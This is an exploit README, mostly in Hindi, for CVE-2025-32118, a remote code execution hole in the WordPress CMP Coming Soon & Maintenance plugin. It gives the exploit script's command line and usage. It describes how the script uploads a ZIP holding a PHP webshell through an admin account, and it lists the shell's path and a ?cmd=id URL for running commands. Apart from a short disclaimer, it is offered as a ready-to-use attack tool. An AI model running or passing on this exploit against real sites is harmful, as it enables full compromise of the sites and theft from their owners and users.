
WordPress CMP – Coming Soon & Maintenance plugin <= 4.1.13 - दूरस्थ कोड निष्पादन (RCE) भेद्यता
🔍 शीर्षक: WordPress CMP – Coming Soon & Maintenance प्लगइन <= 4.1.13 - रिमोट कोड निष्पादन (RCE)
🗓️ प्रकाशित: 2025-04-04
🔐 CWE: CWE-434 - खतरनाक प्रकार वाली फ़ाइल का अप्रतिबंधित अपलोड
📊 CVSS: 9.1 (गंभीर) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता CMP – Coming Soon & Maintenance प्लगइन में WordPress के लिए (<= 4.1.13) मौजूद है।
यह दोष एक प्रमाणित व्यवस्थापक उपयोगकर्ता को निष्पादन योग्य PHP शेल वाली दुर्भावनापूर्ण ZIP फ़ाइलें अपलोड करने की अनुमति देता है, जिससे पूर्ण साइट समझौता होता है।
<= 4.1.13)python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of WordPress site
-un, --username USERNAME Admin username
-p, --password PASSWORD Admin password
| Flag | विवरण |
|---|---|
-u | WordPress साइट का आधार URL |
-un | उपयोगकर्ता नाम |
-p | पासवर्ड |
nonce प्राप्त करता है।style.css (मान्य थीम प्रारूप)nxploitedshell.php (RCE पेलोड)?cmd=whoami निष्पादित करके शेल को सत्यापित करता है।एक बार सफलतापूर्वक अपलोड होने के बाद, शेल यहाँ स्थित होगा:
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php
इसे इस प्रकार परीक्षण करें:
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id
यह शोषण केवल शैक्षिक उद्देश्यों के लिए है।
इस कोड का उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप मालिक नहीं हैं, अवैध और अनैतिक है।
Nxploited | Khaled Alenazi